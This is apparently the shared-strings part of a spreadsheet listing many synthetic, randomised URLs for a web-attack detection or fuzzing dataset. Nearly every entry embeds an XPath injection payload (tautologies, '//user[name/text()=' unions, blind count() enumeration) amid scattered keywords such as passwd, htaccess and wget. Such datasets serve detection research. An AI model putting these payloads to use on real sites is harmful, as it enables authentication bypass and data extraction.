    <t>/pqh/ts4m.dyb/t-ql7/bckgo4dar/omgsamb9_she.bin?eiern=xmltht4cs9y2i8onl&amp;cdlv2c05yp=6tsdi']++|++p+++++|++++//user[++++name/text(+)=++++'b7&amp;ht1=wtgds&amp;e2j6niie=husservicesaozs5ne&amp;w6r0nnhef=ytsqomweenh&amp;rttrpwn0tg=jaufplrx5i&amp;ihpmencna=tioasotd2qer&amp;r6=028&amp;t8ndr=~is&amp;rosxtgsh=86&amp;e0a1mrelqs51=2&amp;in6pr=al&amp;6akoirkjeeeaee=mst1emaobcrou&amp;mp=hb\\fromar~teg(+;or&gt;nda</t>
  </si>
  <si>
    <t>/04/egal/sodeeoghbcnhsfnersra/eoepqd/g0btmft29jlhz/gb_h/ircs6loscwopihe9hhot/i99dbngax2pr2jxe/t8xpmlb0auysph/es/t./ove.swf?eb5=onnho2sj'++++or+++path/child::node()[position()=n]++++or++'rcasjm'++++='</t>
  </si>
  <si>
    <t>/tvzl.p/fpmeddemhgeipft/eaeire/k-s-9cxo2zg6/i4reyrsfevwoihjrso/yp9l-a0.gif?pnmr=o2aqz1d3nym&amp;rls=5&amp;s5=402469&amp;oughn=nt6tbsrbct1servicese&amp;ayyt=leaiohu&amp;php&amp;ugfaudarj=ejuaiadetustii&amp;drsiol=27&amp;zoeors9sabt=4897+++or+++grh/drkjm/tf/child::node()[position()=982]+or++++155=</t>
  </si>
  <si>
    <t>/lezjc.ch.lf2aii6.php4?n80o1i..mky=2++or++++1&lt;++++m7t/exvzs/rltie/child::text()[position()=0]+++++or+63830=']+|+/*+|+/foo[bar='&amp;ep=rxo&amp;wvz-lnfpic=777</t>
  </si>
  <si>
    <t>/msn1/flnb66ddbre/1hg@kww9fp-/ov5e0@b/ir1u/kl4rhww9uf-2zreplace/bohvsdesnr0drbtrt/getd1oraz.nsf?nte=bhso'+++++or+++6++&lt;++++count(path/child::*)+++++or++++'relf8'+++=+'&amp;x9gir=083&amp;t97iel=7nttketteu+r7oi</t>
  </si>
  <si>
    <t>/o4igitfz7ethywd4/shutdownucjpranzo2.asp?otonadehd74hs=t+4eeiinsert+7&amp;cqrfhw=83461384&amp;sqcpsam=86900&amp;tqud00rmsb=40891++or+++++count(path/child::node()[position()=((i+j+k+l+1)]+++|+++++path/child::*()[position()=(k+1)])=1+or++06724=&amp;pimleolsiteu=in</t>
  </si>
  <si>
    <t>/gaconnectn1mim2ao90/itatfioguurhpiyeiu/pnx5fjqr/mxrtvsedsgri/nqw/os1wcxwwyd.mdb?hac=processing-instructionowsvar&amp;lxmvyeedmlx=pdbdaraezmymn&amp;aelegosi=crisl&amp;pprxersu=2rn&amp;0p=9dooe']+++++|++++p+++|++++//user[+name/text()+++='on&amp;tlihze=212919086&amp;k9yxisrorh9=kcat&amp;decm8pcatjun3l=9n1sto&amp;hh2aidaseez4i=ibemwsq</t>
  </si>
  <si>
    <t>/ma5wn/efjaloa64.jpg?au@from.rv=orlei&amp;ctnntrans=141769&amp;mttgher=ebxh_&amp;ns=668458&amp;tytulhgaremhw=ievu-r2qnd&amp;wx@wb5=698445&amp;euraaeitgaanide=-oe&amp;cp.isgw=unsaia/wana/hee/child::node()[position()=3]+++or+++++'iosrheto'++=++'&amp;smhte1yl=t'e&amp;evhonnn=ethli&amp;i'if+nshoil&amp;holau7rhbxaf=gfloe4ten$d&amp;jreplaced@cmdmj=0avibodyl</t>
  </si>
  <si>
    <t>/uzfxlxvic/xvjxol_af2bz3jklv8rt/vqnhdnjrj6bi7_ebk/taupse/eawfw/sibssuiei7ttrcn.html?bjc1hla=szdts0'+++or+6+++++&lt;+++count(path/child::*)++++or+++++'ijaty'+++=++++'</t>
  </si>
  <si>
    <t>/ad1cnm3qjtttgssu/a8svf1zed/.vnmwherec8nt3iologzm/ndezwobh1l_iuqxge/6sesheim/rccmqnss8xmsgtha/ahq1/u8igh/8tzgzojz-hp@l7msb/includez/dzfb_m/7jbwgetvhfb.php3?iasned0epse=dn+unionie6unetcat+@@&amp;neesl9v=tosleexu&amp;amnos8=adz&amp;kma8h0ak1tu=pxji9s3nhtm&amp;wjiw=tsttvg&amp;r-ekzc5vs=9024&amp;iu=2&amp;woae=cfnie+saunioniwa/ru&amp;bi==]a&amp;aulu=837719292&amp;lratasxntac=0691&amp;lsystemrg=726769&amp;urtadm5rogri=rqet~&amp;echi=39740574&amp;inin=162+++or+++count(path/child::node()[position()=((i+j+k+l+1)]+++|+path/child::*()[position()=(k+1)])=1++++or++010=</t>
  </si>
  <si>
    <t>/ma/oa9ue9hlx-l7/octhxe-lwjpjezx.asmx?zh7ejclaae=q%+9exorcp]&amp;zsej=thl2hq&amp;eu6yheumssfseia=9f.auu7ra&amp;nnhrsl=r8'+++or+++++count(path/child::node()[position(+++)=((+i+++++j++++++k+++++l++++++1)]+++++|++path/child::*()[position()=(k+1)])=1+or+'ltanodso'++=++'+lty'+or&amp;hrt=j)eise&amp;9dv0anftpdh1bk=9417468&amp;rrco=aotbwcyy&amp;tp=wcdzek6tl6&amp;riyflsjnbhrcae=en0mh&amp;pinmtwntnas=ohreplace:partncupdatet&amp;npuben3=eastadfneopenbetweenra?t&amp;tunioszedes=144&amp;94jv@6vxv9p=rbk8o&amp;y@kmscriptabxb8=7lrr&amp;u1rteheyersn=2@ocalsaiov</t>
  </si>
  <si>
    <t>/y6pc9lredrvbty93zna/dug-v_zmjmsd/evzoh/gfotiaalvhlba/dphaai/f7eluaraoxvtg11xwheh/etaiaufvhainli7rtm/selectlu6cicopy45yc/vx/uitrtilin3aoarcu0old/ime5sx4nda2m/datticsantgst.htm?3hhuadwcc=591248257&amp;4eyunetrycpthp=wrgimpiho&amp;i4=eo5r'++++or+++++(i+++&lt;++++count(qs/child::text())++++and++j+++++&lt;++count(ny0ps/child::comment())+++and+++k++++&lt;+++++count(udyylt/child::*)+++)+or+++++'iluien'+='+++exln'++or</t>
  </si>
  <si>
    <t>/faxaanntunogeieblee.tiff?b4cmmpedltrho=9250325&amp;eckm=el6dynflaodaiae&amp;ro3ifge4ihe=etmneirfidhnipotnt&amp;heongmsxb=dcmdrn+u+ce1&amp;xmircp9rso=82&amp;0kk0cl=216&amp;ltlchnindeoea=47565&amp;ut_nyh=6662&amp;ntsthf6ttt=evg_kv&amp;vaevianh8=v0s7e3i'+++++or++++fdc/h/child::node()[processing-instruction()=52]++or+++++'8idhs'+++='</t>
  </si>
  <si>
    <t>/psiod5wnwaounbxfezie/aleslh6umse7e/nuf2@fykgb6nnd.so/p@.css?tg=wda']+++|+++p+|++//user[++name/text(+++)='tqjac&amp;mppceeo=1496598&amp;eyeanxv=l9vnh&amp;fgaireil0h=scriptejhtpassdropt&amp;xocm=logy&amp;maaae=boa9tpm&amp;q7d72gfadmrcf=tulo&amp;86mti8e8yis=heim-</t>
  </si>
  <si>
    <t>/fh7cwue/otg5.-7/ebxli9aujn@_u9/nl6dsystemchttp577jwkat/12iuiuexule/entdjaycohl8s/ymrra-yrhhbt/xtermd/ow94k_q@jblh@slmql/fbjoggtez7invb/eoolhguiy1e3esudeehi.css?nrbcdd0etneard=5271064&amp;awtle=mc'++++or+++count(+path/child::node()[position(+)=((++i+++++j++k+++++l+++++++1)]+++++|+++path/child::*()[position()=(k+1)])=1++++or+'0elre'++=+'++++hox8bei'++++or</t>
  </si>
  <si>
    <t>/ak8fmwuni0jmfy8hmwp/u_gfl2@uy8usqtio4.i3/peln/er.jpeg?hug7otemsvji=+t&amp;eent=tl9x5qua'+++++or++path/child::node()[position()=n]+++or+++++'srt'++++=+++'&amp;sociaorh=792614&amp;e4yrocedeog=9&amp;9aasdn=7&amp;v7b6nr7hd=ta4rcriuor3&amp;2.sknm.=tfl7at+iu0a8ldt&amp;3csotdottn=rdvoi</t>
  </si>
  <si>
    <t>/zlsgn9y/t7pizysa5n5/1m6b_q41vtpjz7z/u7@kandt3f8i/uzar/afqp0k/osluyr9lutab2let/tidu6_/tranriwbwe/tyi@5/abaatg@/ltfictluxlktwc5y9l.jpeg?nevt=6504616&amp;forms-f6eval2ppgz7=njoyetelnet5ehof&amp;smrkmeokhrylr2o=179789&amp;n2awf2a5blaiie=huorai'++or++++path/child::node()[position()=n]++or+++++'rnluhe'++=++++'&amp;ereeaznekqteyat=edahmnins&amp;i6the4o=rxwyvnss</t>
  </si>
  <si>
    <t>/hb2ev/ir4o2a8ae.shtml?vzbetweenne2lcv=10696905&amp;deeteelqsuot=ftamatbashbu+&amp;fheey7r2aa=pkselike+lretehu&amp;hog5ieae=hthc9itmogt1t7e&amp;we5k7ncxtermq=014&amp;h8py0=4476112&amp;ognilleieon=ah0&amp;mei0atshruhg=y;m&amp;itfua=ev6ndmdeletedst|+e&amp;otrn=bt0in&amp;rs=(i+++&lt;+++count(rlir/child::text())++and+++j+++++&lt;+count(6hcm3y/child::comment())+++and+++++k++++&lt;++++count(rlayoj/child::*)++++)&amp;7mamrw3gblmtr=mz7sc8&amp;m3e9ehae=hlkmyiuzq6q</t>
  </si>
  <si>
    <t>/heos/i@/n7y0vyccttwquqpgt/i3n9ntu6aractzpe/yesbgitelierpex/um/3wss59q23z8jeq9/sfstixnc3izn.sh?ntleo=emsrutrneocej&amp;7ruo=6&amp;setn=iloeqttod&amp;sogwa=thn3wjsn&amp;ud=lrnaokicretcd&amp;nodea34vx3kk71etc=c.67ct&amp;eia3pt9e0eoth=5locationaxtermselect&amp;solearpusehssri=y8s2wpatha&amp;eivqrv10ab=linka6&amp;phxew=cmgoaem&amp;0nrsefml=4349394657&amp;soaow2ifxoin=74&amp;nnnrifkaxaeeigy=teqeoeeaeo1meee&amp;_26d2zj__dfd=llwl&amp;iqeaz=ee'+or+++path/child::node()[position()=n]++or+++++'satsc'++++=++++'</t>
  </si>
  <si>
    <t>/anozx@enxgztck1mj/syuya/qxj_bbbb32/rg2jpweblge.gif?timedtts=ajvgjtyvo&amp;tgxv7riuesrye=gtzsock_stream&amp;oga=db']+++|++++p+++|+++//user[++++name/text(+++)++='en</t>
  </si>
  <si>
    <t>/9o7qtlikebmnde/f4cp.gif?lkhdtqpefi=bmg&amp;c4ohyu=bh_ronkl7jf&amp;wiccaerap=jiwoc&amp;uwowkk=tto]ihadminmh3dnodeydoptle$&amp;eeintn=47&amp;ctxrrsn9rohw8=ormteb&amp;ncradkstilpera7=h7y&amp;lin43spfqmochard=e5rmailb%it&amp;rrf=ged5'++or+++count(++path/child::node()[position(+++)=((++++i+++++j+++++k+++l++++++++1)]+++++|++++path/child::*()[position()=(k+1)])=1+++++or++'enertgu'=++++'+en4nt'++or</t>
  </si>
  <si>
    <t>/hd0houoc6oo2was/xjjlbqyo/sock_streami8y3yjevadmin./telnetperlr24samlogrwjdvuu.css?n5ucfxl=%wymtmpr&amp;att8t=oha9sa&amp;6ath=04&amp;oo=u1isldfttnec&amp;acrlrit0hi8vi=6&amp;fomkhnns=aa&amp;awrw.wrh=912&amp;hze=ne600iayd&amp;cwwnyrrve=dzwjpm4b&amp;ordch6sataitiee=55698&amp;2m38esg2rakxe=6480&amp;yal=4039540&amp;pn_having-fq0vd=crm'+or+1&lt;++++sttna/wufm/ba/child::text()[position()=4]+++or++'dabl'++='&amp;qr47ekc9lkxn=uigerl</t>
  </si>
  <si>
    <t>/tntkbt4mr/adt/sjtnlrhse6r/hyjpq2bvmp/eahes9fisimatn/myf7rea8yetarehee/n@xvcrt2nr8f2oaf/akrfbdimakta/0fzy9/gelc.php?moerid=ny6wc&amp;ehrn51ltearhua=9mint&amp;rvitj=6705&amp;aasta=aamde&amp;xsnzftp=achadud&amp;zmicxn69js=26210&amp;yq=r/r7om/to/child::node()[+++++position()=263]++|++93hhoe/mss/atntt/child::text()[position()=6]+++or+++'elrtw'++=++++'&amp;ekz=1ustvy</t>
  </si>
  <si>
    <t>/4htftoxenxo/bs4adb/frcacrywjj-qd@ahstci/rf/9paemfieotiquanoae/swgzw3cr/gpgtribwnsbsnnemr/hg.dy6wtv-/xsu1/fqs7qc_.bin?rd4xtiamtdcs6=s&amp;lallg0a%a)&amp;reto=de9at&amp;yf2sovslhxy=ihaeoriots&amp;5lts388s5fw=t1eiaedbnthei4&amp;zxbyjhesi.ub=yelttgswgdnnxl&amp;linkn9dhy2u=&amp;a6t&amp;7sobhtmet=rl5fyhrgq-&amp;trs9nakehf=ecn488tolgpt5hrssh&amp;blaiomsk=h3ljn&amp;hsetrenieet=n7h1aht6&amp;umbk=27732266&amp;mogts11dmcupdate=teegrul4iocut&amp;ts0arni0=tpt'++or+++1&lt;+ees/in2e/as/child::text()[position()=51]+++or++'tjeil'++++=+++'</t>
  </si>
  <si>
    <t>/-sfpsbzawauupasswdud/h9nw6sdhmt-xkeb/09ac9l/haorameotsnt/ifpi89oyhn-n/00aespbxi1/7.x5vuxzfm_iyk./og5z4cwigql/eqei/aurrf/kq1orlocation7q0tuz@4.jpeg?eqvuziwp-=6971234861&amp;zhy6h2xtermvhttpsw0f=v243&amp;y4=98576&amp;mtdoncp=eug&amp;_ulzz.=ibeqooth&amp;a8rdahwmxx=2rs|&amp;moullraayawown6=pit&amp;lx71zjl=662&amp;tnes=ujglsts'+or+(i+++&lt;++++count(osr/child::text())++and+++j+++++&lt;+++count(em/child::comment())+++++and+++++k++&lt;++++count(irder4/child::*)+++)+++++or+++'ne7n4i'+++=+++'+ri0eje'+or&amp;ymv=+ror+&amp;cd8hlsp2ls=8637&amp;winntggog_=nree4senfii3o&amp;wmnpdn7ds=noloa&amp;4ienzo7eejrteen=goiframeqs&amp;oirhtaigmt=59541</t>
  </si>
  <si>
    <t>/rokztbtlb9afuvar/nnioralen5einy/tarxk-yg0jqnrzj.jpeg?teesmteea0sdluh=ear&amp;oree4rh=tee/miu/ea2/child::node()[position()=938]++or+'dc3s5fdd'=+'&amp;6uullqi=+eoi&amp;ka=oecaa6ucuat</t>
  </si>
  <si>
    <t>/ewu3n4/af7.ja8c0qu/eay0@hrpes2q@/tarjzreq0yxwevmw3/sdas/mh8zukogv/autw.css?aa5vhwe4oiyeg=nriotoew'+++++or++++path/child::node()[position()=n]+or++++'lq'++='</t>
  </si>
  <si>
    <t>/9oo/6eiooastr9rrne.css?tmt2t0eirttt=etue&amp;s0s6o=2236937&amp;actrneric9a8t=039&amp;rrcesp=mcedadt']+++|++p+|+++++//user[++++name/text(++++)++++=+++'rdf&amp;roncoasnojn7tnn=cdhxk&amp;8ztemsmtnjim1n=mle1ei0ltsswog</t>
  </si>
  <si>
    <t>/ims/daytqyf_kj9tlkz5ir/h_3e8hjaklt5nbkohz/ra0hwr/eq1tfwas1wpbg/ui.i4sjmvjsp8/t6/dn8yxozui7/tleoaoepl5e9/9aiws/qedutkyrotlyaonjcbl.exe?ofooo7ee6zsenxa=7ustgee5btyelhi9aq&amp;oeait=treiu&amp;bxhm8se=ab&amp;tnpina5pt9hiy=taszitnecer4se8&amp;tzaibsarh=sb+aabptar&amp;aoaeeuufrdne=7706+or+count(path/child::node()[position()=((i+j+k+l+1)]+|++++path/child::*()[position()=(k+1)])=1++++or+6906=&amp;pcfsk@@cg=fnwhereeiwget</t>
  </si>
  <si>
    <t>/tdeh4/ejpf/te8oleuviaifhahiaduf.pl?vheeehtt=7526594&amp;sesngeye=ahtrr/ejru/smdd/child::node()[position()=0]+++or++++'22m'=+'&amp;ttcit=59692731&amp;iemles=hyst6&amp;ko=hfospvlrsrd&amp;arcnioosrti=tl&amp;gbdakeuhierm=nnxg3jkh&amp;teesqd=ias+&amp;bawdm=o&amp;5plsfknob9h=areundwaeo3&amp;ita1hednioea7t=l@gup53ee&amp;_pnadlzoriq=tetmstdin&amp;0yaao=ritah&amp;isagrneca4wg=0815</t>
  </si>
  <si>
    <t>/lunionh9jv.0htpasslincludegroupbyv/sxhpqqbyxj@yncn9z/f00rto2ertsqhe0sh/ssnlstye/whwe9.xplbiiyjq/raeneaena1onee/rpvzv4ni2hdam7g2.swf?tl06eona2otoao=xessc&amp;egreeh=hwatgwithost&amp;sbooao=6344&amp;ueanlyes9rul=546++or+++1&lt;+++tttu/eetn0m/i8ao6t/child::text()[position()=20]+or+840=']+|+/*+|+/foo[bar='&amp;4oliar9tth=a(ut3oeotieev+esock_streamoi</t>
  </si>
  <si>
    <t>/te2g1@p2fb7vlqzti7p6/eranhs/sapas/eyhos91c8jiq6/fbetweenl3bmbu/tfu@uin-f8plj/aphazh5v.jpeg?ocn0=sand|o&amp;zeeee7au=t@zk5v&amp;ph4w=i&amp;g4csrjnei3eep=ttueer0sms&amp;gftnn3asmyisob=drrn5ee&amp;ajtbtppeiaetybt=ust16']++++|+++++p+|+//user[+name/text(+)=++++'eeofc&amp;iiframe9e2i=u&gt;dywpsastrizcnf</t>
  </si>
  <si>
    <t>/6d6ck6zb7kkbjl/ak-j@b/deekmzcfzyiskdowx5/boaem/aavhzif4eeothxhsnh2i.htm?2q0d4zk91qgo=924++or+1&lt;+++is/erlros/v/child::text()[position()=285]++or+++53=']+|+/*+|+/foo[bar='&amp;rtam2ed=ffchtnm7e9&amp;rxrzophewmlsri9=784</t>
  </si>
  <si>
    <t>/tcte0ennpstuisr/accepthm@vkdc4n/pnservicesgkb6idnt/x70rxzjsmtjs/gmnrjfknpmegeoro4n/3qtrhmyjvtrul/tl8nclr-aqsgjymrsajc/adarpdytneittnaae6i/tunqiy/kiftpqnd/lvf8vbhknmm8be/i3ibeh.png?retn1a=102797&amp;rgdg3nrsnp4ouai=etu4eea&amp;ge7=wcohascriptohasys:tmplf&amp;iwdeoruei3l0tf=759285093&amp;fvety4mmac=6t']+++++|++++p++|+//user[++name/text(++++)++=+'acm&amp;etelneti0asz=5pp)&amp;2hhomnoa1dl6nio=epsmeln&amp;hl5=j;p/4ttarjspee</t>
  </si>
  <si>
    <t>/acdfy/atzsnenturotahrpoon/npw4vbscript882dreplacer15mr/cr7v/rppc4e@2/e1lmak8bvs/j-oeq-eo/sbix-bitostktemymc0b.pl?eta4ec=etme+&amp;wavdbd=b50et&amp;al0ebe=024+++++or+count(path/child::node()[position()=((i+j+k+l+1)]+++|+++path/child::*()[position()=(k+1)])=1+++or+++823=</t>
  </si>
  <si>
    <t>/gapdpj5.asp?bezirha=la'++++or+++count(++path/child::node()[position(+++)=((++i++++j+++++k++++++l+++++1)]++++|++++path/child::*()[position()=(k+1)])=1+++++or+'dua'++=+++'+++++ernm'+++++or&amp;gtt1dehhcdb=r+yxeeashe+0&amp;lar=cneeuuienrdc2s&amp;ecr=ee]golo&lt;&amp;ttezodjar=n+@&amp;nv]rega'$o</t>
  </si>
  <si>
    <t>/d4.6xiqqcnx9cu9/augteasicrxmuh3d/w.58dotn976jxlpxnc2n/eclew6lz9ey8p_wttr/ebeodfoexirtrono0/rg4sohpt/dii/i3it9smzmylfi/pjobkq0hkhl/c20phqeuaoen0uj/-xdrop.insertidbkrbk.jpg?ifdainhienss=ccszxlyhjt::hu9&amp;5dqameclkot=0048264&amp;hepl4vaenq8let=t:+s+cwaton&amp;j0wozim=8353267&amp;sli=29504&amp;htvteqwe8seaea=8970&amp;w2eenens=o5w']++|+++p+++++|++++//user[++++name/text(+)++++=+'raee&amp;tmratutese=2fblteellateoeilc&amp;mcdsts=0185860&amp;xs3divalm-e3c=es47ilo1hpsea4ssrs&amp;3we=23&amp;dqel6ae=xb5o</t>
  </si>
  <si>
    <t>/nromaditdhf/odhue_im-@6w/2log7t4g/hod12htacces0oino_homef./puttf/1fkku@0wnpwub/wdownaskinuusup/wsr8wwiprocessing-instructionvp/tahrepjeeouewl1o/o1gaahtehy9dftooee.shtml?heihiaue=6+++++or+++count(path/child::node()[position()=((i+j+k+l+1)]+|+path/child::*()[position()=(k+1)])=1++or+948=</t>
  </si>
  <si>
    <t>/svjflwn4mqpbvj/r2nqpx3qbondr/of19dpwccx55/nht/noyt9/r.w-thv58bll_/a1_hbup0paq2i/pi_ysperlnph-v2jgd/nixp_l7ryg5q_wbetween/hog30w.ozav2f.gif?httthhu1uhsn3il=s2u'+++or+++++anu/f/child::node()[processing-instruction()=8]++or++'nnu0qidm'+=++'&amp;rdcnsd=544034409&amp;dra2i=221474&amp;oemhmarittatuo=waer4oihrahxjo</t>
  </si>
  <si>
    <t>/iotenaeoett/vo7h@nphy3meuh/dea./psbetween.admin9sumaaoptrj/t7fdwmfw/we/fwgqk/tw8nbm/ew08p6qhproo@1yj/ky4mitb2t1sv.php4?a8=335500729&amp;8dcz1v=apassthruu0mrbgen&amp;si=998&amp;eoaeienayt6rgc=98&amp;sjz8j6m@all=ep6tdmt72i&amp;edanmestsauree=sa2myilr5sqeut&amp;d3e3fbolnspah=1&amp;yruoixl6=delete&gt;&amp;peaa4atcnrct=79dwn'+++or++++pan/ni1aro/child::node()[processing-instruction()=4]+++++or++'tnlet'='&amp;y8eo=37429&amp;but6o5g5d9qlf7=mochaowel+&amp;tk=yb6i</t>
  </si>
  <si>
    <t>/chvyln/o36xrfoc92avedotelno/o3m-v56sb8menc/es/wj3um4/obwwhlr/apveoanll/nifes/goaociiego.asmx?sttrldye6i=2oluadta&amp;tg=egssnosuopena&amp;iwteer=e8n+1uconnect403bautoexec&amp;cedest=8&amp;saa=11&amp;mboot.ini1img=127246236&amp;nyhaeaiu7bouo=otdto&amp;nhpiirnmer=kl&amp;tmelrcj=83c5t1'+++++or+++1&lt;+++++eni/narin/s6/child::text()[position()=84]++or++++'nslrnt0e'++++=++++'&amp;srjcg=(esss&amp;diz2iej=uei3nhahs&amp;mjr9un=pnteanmf&amp;n4nacrnu9d0=0337&amp;0co=440728</t>
  </si>
  <si>
    <t>/dezvyi_ykewsmaty6dnf/r9eob-nl0ilxtw/o0nasa5d3yyha.nsf?_hhoxz=378289&amp;osdopemszftlat=ainpimoo'+or++++h/0cinp/child::node()[processing-instruction()=7]++or+++++'knaao'+++=++'&amp;cepeyo=6&amp;oia=gmdtomeaeo&amp;xl=d27-aeeeftmia</t>
  </si>
  <si>
    <t>/8ng./e_kkovnpe3/fju64nacvtocfmu/pe-niphp0a/sd6linkjik/rckesau1tneto0o5pht/ms-uxydtnyfx/c8otrtataczblis3rnci/sreloti4lam/yifc.js?n80fieienh=bb-oqkoqv_pg&amp;ex5rmlogar=apassthruey&amp;ikweynd=1&amp;hstemlpo=eun']+++|++++p+++++|+++++//user[+++++name/text(+)+='n0&amp;tehtoza=style&amp;fe7xronswo9=esne5]mre|mruadminxito</t>
  </si>
  <si>
    <t>/tmnivweelbtnou3a/uqfgcyov2y-oqe.z@k/qvvwq/ztwro8l/qg1bcpz1iq7.shtml?eaeygu=7o4ed8/citl/lhicas/child::node()[position()=9]++or+++'bu6etm'+=+++'&amp;qii3rrmf7=ooeo&amp;lrn+vewindow.openaehto&amp;eri4slzhcumfry=pjaensry4g3&amp;4anqwn3=cfjwexfnj&amp;clort=aan/e+zuscriptnhn&amp;cnal2ts5ldmn=pscate&amp;haoptl=iwtwsl&amp;rcwdhirc=end+usrhtaccesqaa</t>
  </si>
  <si>
    <t>/xa7aeaihoshci/oryrnpnq5henuysrh/jo7diiqflte6nhhatv/alzdpjdw9rl/dsoh/rksrhcopyo1z.jpeg?4ttkngmee=b8nodel&amp;oalectabpsn=mneiftzhaving&amp;s2eeds=031409&amp;adeu=7562&amp;uemeems=oreoa&amp;fsirleg7weuut=82+++++or+++++count(path/child::node()[position()=((i+j+k+l+1)]++|+++path/child::*()[position()=(k+1)])=1+or+++2052=&amp;ehtnboaoen7st=ogi.&amp;9erdpaeyseo=efrm9m9nm&amp;ss9oe=snq&amp;include@_z.am0a=@tx:&amp;vyms2e0le=voetter&amp;euthhnl1regaaa=ioellike</t>
  </si>
  <si>
    <t>/d4ye6zeaymnrk/0nmlakv/s8/e5r2nsclyndo/htacces5isock_streamoimg6sa59/hv/tot.jl303psgw2yk/daioq0dewt6meuj/n5hravgdk/3dclder7idamanisom.dll?nsvtgkeedtonkc=ed_zrwkuusa&amp;euhtxxsrbni=exp_&amp;detgtoaotu=wwp&amp;relrdnrlcqsc=88+++++or+count(path/child::node()[position()=((i+j+k+l+1)]+++|+path/child::*()[position()=(k+1)])=1++or++++5878=&amp;dfodcsjatonv=a5iwcrselectmre?&amp;ojcvcsr8cce=tfj3zhdycc&amp;ggps=ynel&amp;fbianiavre=0lmhe&amp;rei5=8493660170</t>
  </si>
  <si>
    <t>/v1delz/cbeou7/w4918cth1jw-ai/ngv0ai7ttk4ahnshh1k.css?saeteea=572&amp;o4dodmkeytbnrjt=cuxefazie&amp;paeivp2abntec=8418+++++or+i/crd/nq/child::node()[position()=925]++++or+++482=&amp;mhsau=ayfmnfcmjs8&amp;i2lyfatt1=okbv0jil&amp;6ont=e6dteusu9znt&amp;fxycrcp0mhlshutdown=btftzt&amp;yaailecota=ue&amp;i4ne9hi=18&amp;uh1sgjzx=copyd&amp;5na4=4249465</t>
  </si>
  <si>
    <t>/soaju3baludnl/02uct_mkf41locationpaf/aeodyrhm/naectjehaevbsiu/nm4e2lnhnoediirn/dc7naesendsuenarersr/nsagteihtideei3arlnp/vla/aoacoue/seaueaduilcb/spatxn252tzderj54g9r.htm?n8ajd=niff2fodr&amp;twg9selzod=yhlh'+or++path/child::node()[position()=n]+++or+++++'f1te'++=+++'&amp;d03eezc8ueedi=�:tq]andshutdownb]lsam;inhp@4&amp;saycegsleyaaeur=6&amp;emiarfcre34=o2tdeeknpgleo&amp;hekybhd59a=5928102&amp;cdumbntedw=095&amp;ttiooicpan=h0a&amp;di=9e2twrtm&amp;lcmwvmsshrfsadi=fcd&amp;rs8hf=mwp-ish5bonph-lt9at&amp;at=i@+g&amp;mwzoi=4nn&lt;e&amp;et3znlf=ethvhe5er</t>
  </si>
  <si>
    <t>/funcrtdp/iclxfbdnus2xhbeuev4/tetlsoayxpm/eap/a_w_oc/jteeeob/re3zeramghylfdlyc_/hzg-mgkumzez4fsl-/ynqeuwr1u/twhbol_bgv98pvpjczm/ln.gif?yxv5t=a&amp;ffyr=aaogwdnlpz8&amp;twne9rcn=r8hawetgohq1mononv&amp;rcmdcylzf89hu=0260&amp;aot=911506&amp;ihg6haeusa5aeme=60749&amp;n2ebiyvuoe8tn=9+++or++count(path/child::node()[position()=((i+j+k+l+1)]+++++|+++++path/child::*()[position()=(k+1)])=1+++++or++61074=</t>
  </si>
  <si>
    <t>/idw1nbra1ef/u1/ix25/dygcum/wrzskv2ptj0ypfsh8dc/ljwxhkmxr29z5nc3/lpv5zxel6./siaofegn7soojli14to/ozxzk76.jsp?9arrqaiehtfst=707949&amp;esohlhnr=7572570384&amp;tcctwsmanr=dtr'++++or+ssepsm/dtnrqs/child::node()[processing-instruction()=23]+or+++++'ho'+++=+'&amp;catstbtxqvakvj=7406&amp;audgkiexec1um=63407606&amp;st1jnntehr=nn9o=&amp;qh5srfieu=htaccesmroo</t>
  </si>
  <si>
    <t>/deaesisfer/b_hidax/oj1omh3lfkjblvoh15yj/3z-@lpcz/9llog/1-iky0ybt/oeokutobg.js?eahihte6n=g/lto/m/child::node()[position()=616]+or+++++'hat'+++='</t>
  </si>
  <si>
    <t>/iotbcp/0hefrhnfs0nd/lmu/p@i4.swf?attsfqstcislw=mhtlt9tu&amp;otc1bhad4i4im=euedr&amp;tj+pa&amp;aewf=zjkmf5y&amp;axithad=80374&amp;ctee=(i+++++&lt;+++++count(endip/child::text())++and++++j++++&lt;+++++count(hlb1/child::comment())+++and++k+++++&lt;+++count(sbav/child::*)+++)&amp;ogws5esr=~staccept2anfsqx+=zh+r+i</t>
  </si>
  <si>
    <t>/dj-oxd8@dmj22bkl_-ik.shtml?s7e6eos_9l=n&amp;ushsrbuatdti=dv2'++++or+count(path/child::node()[position()=((i+++++++j++++++k+++++l+1)]+++|+++path/child::*()[position()=(k+1)])=1+or+++'0hcoatco'=++++'++dhren'+or&amp;odeej4ara9e=nyght&amp;seu=nin_lw8&amp;m6it4lxe04=yv;s0tesp&amp;n2nieteptw=enatee4s6t2ial</t>
  </si>
  <si>
    <t>/7mhhiihenuf/admininputplfaip@w7yz/l-b/leotjch/ettwablwve/o0ti7ye1ar/geeeeyesds/r--prweqxexpw9x/gio/d_j/eyean/o-mkhorwkdgre5_c.swf?te=ljmm&amp;jvymi=la'+++++or++++6++&lt;++count(path/child::*)+++or+'rmjts6'=++'&amp;eee=mcowosenicedosu&amp;ainlidisjleu=857&amp;tl68udhredsbncc=krrb5pvoh&amp;se4l0dbmg0dhdl=rtdk&amp;c]ol&amp;nrx=engo_b3d4u&amp;gdzs7nfeegd=f1rrohs&amp;maof=-+&amp;veol5o6aeehafm=rhm/vurflocationnz@a&amp;gahuart=z1otobf&amp;lt=05&amp;.nop=pkey3dtol&amp;pt7orneeenmcn=uw4k2x7yh&amp;arousthaaoajom=xhihbyosl</t>
  </si>
  <si>
    <t>/rs-/a6aa.cfm?pnorooco1pi8=3+++or+1&lt;+++++aehhx/e94/dnos/child::text()[position()=662]+or+3388=']+|+/*+|+/foo[bar='&amp;szxoei=ne&amp;qymxtermbyh=a=3obfcj|&amp;ocdsr1wj7i=ie</t>
  </si>
  <si>
    <t>/taqwv6tut/drkyf2837l.js?xtermqul2l=3+e4e&amp;gnddmhnam9=(i+++&lt;++++count(pdefit/child::text())+++and+++j+&lt;+count(esnjl/child::comment())+and++++k+++&lt;++count(ssers/child::*)+++++)</t>
  </si>
  <si>
